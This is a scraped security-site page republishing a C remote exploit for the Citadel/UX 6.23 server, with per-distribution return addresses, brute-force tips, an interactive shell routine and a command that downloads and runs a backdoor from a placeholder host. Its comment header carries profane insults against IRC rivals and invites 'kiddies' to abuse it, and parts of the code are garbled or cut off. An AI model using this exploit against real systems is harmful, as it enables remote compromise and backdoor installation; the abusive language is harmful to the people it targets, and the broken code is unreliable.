K-OTik : Citadel/UX <meta content="MS04-007,Exploit" name="keywords"> <meta content="MS04-007 Exploit" name="description"> <meta http-equiv="MSThemeCompatible" content="Yes"> <style type="text/css"> BODY { SCROLLBAR-ARROW-COLOR: #204558; SCROLLBAR-BASE-COLOR: #bdbcbc } SELECT { FONT-SIZE: 11px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif; BACKGROUND-COLOR: #cfcfcf } TEXTAREA { FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif; BACKGROUND-COLOR: #cfcfcf } .bginput { FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif; BACKGROUND-COLOR: #cfcfcf } A:link { COLOR: #000020; TEXT-DECORATION: none } A:visited { COLOR: #000020; TEXT-DECORATION: none } A:active { COLOR: #000020; TEXT-DECORATION: none } A:hover { COLOR: #000020; TEXT-DECORATION: none } #cat A:link { COLOR: #204558; TEXT-DECORATION: none } #cat A:visited { COLOR: #204558; TEXT-DECORATION: none } #cat A:active { COLOR: #204558; TEXT-DECORATION: none } #cat A:hover { COLOR: #204558; TEXT-DECORATION: none } #ltlink A:link { COLOR: #000020; TEXT-DECORATION: none } #ltlink A:visited { COLOR: #000020; TEXT-DECORATION: none } #ltlink A:active { COLOR: #000020; TEXT-DECORATION: none } #ltlink A:hover { COLOR: #000020; TEXT-DECORATION: none } .thtcolor { COLOR: #204558 } .bordert { BORDER-RIGHT: #a9a9ac 1px solid; BORDER-TOP: #a9a9ac 1px solid; BORDER-LEFT: #a9a9ac 1px solid; BORDER-BOTTOM: #a9a9ac 1px solid } td {font-family:arial,helvetica,sans-serif;font-size:x-small;}.tableborder { border:1px solid #345487;background-color:#FFF; padding:0; margin:0;width:100%;align:center } .post2 { background-color: #EEF2F7 } .postcolor { font-size: 12px; line-height: 160% } table { border:0px none;border-spacing:0;border-collapse:collapse } </style>

Citadel/UX 6.23 Remote USER directive Exploit (Private Version)

/*
Citadel/UX remote exploit
By nebunu: pppppppal at yahoo dot com

This is the version which contains targets,abuse it kiddies

Bruteforce:

You only have 4096/4=1024 tries.
The magic offset lies about 2048 + or - 4,8,16....256
So practically speaking you have maximum 256 tries.


Greetings: DrBIOS,Bagabontu,rebel,R4X and all the friends i have.

F goes to: #rosec @ undernet, www rosec info read and laugh
lacroix you are a big lamer,a little script kiddie who wants to gain fame on vortex.pulltheplug
wargame server.By the way,you pathetic cunt..have you even hacked into a box other than yours?
Mad anal fucks goes to all #rosec members,dont forget their moms.

My little private message:

Sa va bagam pule in gat celor de pe irc.apropo.ro,in special lui shell (nimeni) si toata
gasca de cacaciosi de la #rosec
Ce tupeu pe voi sa vreti donatii in e-gold..va dau eu donatii in sloboz..
*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

/*
Place here your own link which contains a backdoor (blackhole.c) which listens on port 12345
*/

#define COMMAND "cd /tmp;wget http://your-site-here.com/a;/tmp/a;"
#define BUFFER 93            
#define CITADEL_PORT 504
#define RETADDR 0xbffff000 
#define BACKDOOR_PORT 12345
#define MAXTARGETS 9


struct architecture 
{
char *platform;     
int syst;          
}arch[]={
{"Red Hat 7.1 (Seawolf)",0x4006aef0},
{"Red Hat 7.2 (Enigma)",0x4006f664},
{"Red Hat 7.3 (Valhalla)",0x080482d0},
{"SuSE Linux 8.0",0x4006f004},
{"Debian sid unstable release",0x4005f270},
{"Slackware 8.0.0",0x40062870},
{"Slackware 9.0.0",0x40061530},
{"Slackware 9.1.0",0x4006be80},
{"SuSE Linux 8.0",0x4006f004},
};
        



void shell(int sock)
{
fd_set  fd_read;
char buff[1024000], *cmd="cd /;uname -a;id\n";
int n;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
FD_SET(0, &fd_read);
send(sock, cmd, strlen(cmd), 0);
while(1) {        
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL)  0);
}
if (FD_ISSET(0, &fd_read)) 
{        
if((n = read(0, buff, sizeof(buff))) \r\n
Usage: %s   \r\n",argv[0]);
printf("\nAvailable targets:\n");
for(i=0;i92)
{
printf("\r\nCommand string too large\r\n");
exit(-1);
}

targ=atoi(argv[2]);
printf("\r\nAttacking %s\n",arch[targ].platform);
exploit(argv[1],targ,atoi(argv[3]));
fuck(argv[1]);

}